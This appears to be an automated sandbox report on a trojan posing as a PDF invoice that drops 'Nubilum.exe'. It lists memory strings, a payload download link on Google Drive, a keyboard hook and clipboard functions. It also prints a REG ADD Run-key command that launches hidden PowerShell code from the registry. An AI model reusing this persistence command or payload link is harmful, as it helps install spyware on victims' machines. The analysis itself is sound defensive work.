            Source: Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/3
            Source: Nubilum.exe, 00000010.00000003.1685702542.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1668821147.0000000002871000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715637913.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1684092938.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.0000000002874000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715036233.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1661965344.000000001F588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp&-
            Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp(
            Source: Nubilum.exe, 00000010.00000003.1668821147.0000000002871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpB
            Source: Nubilum.exe, 00000010.00000003.1661965344.000000001F588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpV
            Source: Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
            Source: Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpt
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.1653296484.0000000005A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: bhvCBB3.tmp.28.drString found in binary or memory: http://ocsp.digicert.com0
            Source: powershell.exe, 00000002.00000002.1646891249.0000000004AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.drString found in binary or memory: http://s.symcd.com06
            Source: powershell.exe, 00000002.00000002.1646891249.00000000049A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
            Source: powershell.exe, 00000002.00000002.1646891249.0000000004AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Nubilum.exe, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: Nubilum.exe, Nubilum.exe, 0000001E.00000003.1694316092.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001E.00000003.1694047126.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: Nubilum.exe, 00000010.00000002.3696316061.000000001FA80000.00000040.10000000.00040000.00000000.sdmp, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: Nubilum.exe, 0000001E.00000003.1694316092.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001E.00000003.1694047126.00000000009CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comppData
            Source: Nubilum.exe, 00000010.00000002.3696316061.000000001FA80000.00000040.10000000.00040000.00000000.sdmp, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: Nubilum.exe, 0000001C.00000002.1711868301.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: powershell.exe, 00000002.00000002.1646891249.00000000049A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: Nubilum.exe, 00000010.00000003.1613936296.0000000002829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000002.00000002.1653296484.0000000005A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.1653296484.0000000005A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.1653296484.0000000005A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.drString found in binary or memory: https://d.symcb.com/cps0%
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0.
            Source: Nubilum.exe, 00000010.00000002.3682803915.0000000002798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3695215003.000000001E560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B
            Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/x
            Source: Nubilum.exe, 00000010.00000003.1635199343.0000000002822000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1613936296.0000000002829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B&export=download
            Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B&export=downloadWw
            Source: edb.log.24.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
            Source: svchost.exe, 00000018.00000003.1652121291.000002CE97500000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.dr, edb.log.24.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
            Source: powershell.exe, 00000002.00000002.1646891249.0000000004AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: Nubilum.exe, 0000001C.00000002.1712947624.0000000000788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: Nubilum.exe, 0000001C.00000002.1712947624.0000000000788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: Nubilum.exe, 0000001C.00000002.1712947624.0000000000788000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001C.00000003.1711574673.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001C.00000002.1713385295.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: Nubilum.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: powershell.exe, 00000002.00000002.1653296484.0000000005A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: qmgr.db.24.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
            Source: Nubilum.exe, 00000010.00000003.1613936296.0000000002829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Nubilum.exe, 00000010.00000003.1613936296.0000000002829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Nubilum.exe, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Nubilum.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: Nubilum.exe, 00000010.00000003.1613936296.0000000002829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Nubilum.exe, 00000010.00000003.1613936296.0000000002829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.7:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49708 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeWindows user hook set: 0 keyboard low level C:\Users\user~1\AppData\Local\Temp\Nubilum.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0041183A OpenClipboard,GetLastError,DeleteFileW,28_2_0041183A
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,28_2_0040987A
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,28_2_004098E2
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,29_2_00406DFC
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,29_2_00406E9F
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,30_2_004068B5
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,30_2_004072B5

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3682803915.000000000280F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Nubilum.exe PID: 7688, type: MEMORYSTR

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Nubilum.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 16_2_02237270 Sleep,NtProtectVirtualMemory,16_2_02237270
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,28_2_0040DD85
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00401806 NtdllDefWindowProc_W,28_2_00401806
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_004018C0 NtdllDefWindowProc_W,28_2_004018C0
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_004016FD NtdllDefWindowProc_A,29_2_004016FD
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_004017B7 NtdllDefWindowProc_A,29_2_004017B7
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_00402CAC NtdllDefWindowProc_A,30_2_00402CAC
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_00402D66 NtdllDefWindowProc_A,30_2_00402D66
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeCode function: 0_2_00403311 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403311
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeFile created: C:\Windows\SysWOW64\doddersJump to behavior
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_048AF0002_2_048AF000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_048AF8D02_2_048AF8D0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_048AECB82_2_048AECB8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0750BB782_2_0750BB78
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 16_2_1FAC719416_2_1FAC7194
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 16_2_1FABB5C116_2_1FABB5C1
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0044B04028_2_0044B040
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0043610D28_2_0043610D
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0044731028_2_00447310
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0044A49028_2_0044A490
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0040755A28_2_0040755A
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0043C56028_2_0043C560
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0044B61028_2_0044B610
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0044D6C028_2_0044D6C0
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_004476F028_2_004476F0
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0044B87028_2_0044B870
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0044081D28_2_0044081D
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0041495728_2_00414957
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_004079EE28_2_004079EE
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00407AEB28_2_00407AEB
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0044AA8028_2_0044AA80
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00412AA928_2_00412AA9
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00404B7428_2_00404B74
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00404B0328_2_00404B03
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0044BBD828_2_0044BBD8
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00404BE528_2_00404BE5
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00404C7628_2_00404C76
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00415CFE28_2_00415CFE
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00416D7228_2_00416D72
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00446D3028_2_00446D30
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00446D8B28_2_00446D8B
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00406E8F28_2_00406E8F
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_0040503829_2_00405038
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_0041208C29_2_0041208C
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_004050A929_2_004050A9
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_0040511A29_2_0040511A
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_0043C13A29_2_0043C13A
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_004051AB29_2_004051AB
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_0044930029_2_00449300
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_0040D32229_2_0040D322
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_0044A4F029_2_0044A4F0
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_0043A5AB29_2_0043A5AB
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_0041363129_2_00413631
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_0044669029_2_00446690
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_0044A73029_2_0044A730
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_004398D829_2_004398D8
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_004498E029_2_004498E0
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_0044A88629_2_0044A886
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_0043DA0929_2_0043DA09
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_00438D5E29_2_00438D5E
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_00449ED029_2_00449ED0
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_0041FE8329_2_0041FE83
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_00430F5429_2_00430F54
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_004050C230_2_004050C2
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_004014AB30_2_004014AB
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_0040513330_2_00405133
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_004051A430_2_004051A4
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_0040124630_2_00401246
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_0040CA4630_2_0040CA46
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_0040523530_2_00405235
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_004032C830_2_004032C8
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_004222D930_2_004222D9
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_0040168930_2_00401689
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_00402F6030_2_00402F60
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: String function: 004169A7 appears 87 times
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: String function: 0044DB70 appears 41 times
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: String function: 004165FF appears 35 times
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: String function: 00422297 appears 42 times
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: String function: 00444B5A appears 37 times
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: String function: 00413025 appears 79 times
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: String function: 00416760 appears 69 times
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exeStatic PE information: invalid certificate
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@23/23@4/5
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,28_2_004182CE
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeCode function: 0_2_00403311 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403311
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,30_2_00410DE1
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,28_2_00418758
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,28_2_00413D4C
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,28_2_0040B58D
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\twinsomenessJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-7CSH4D
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_03
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsyB32.tmpJump to behavior
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
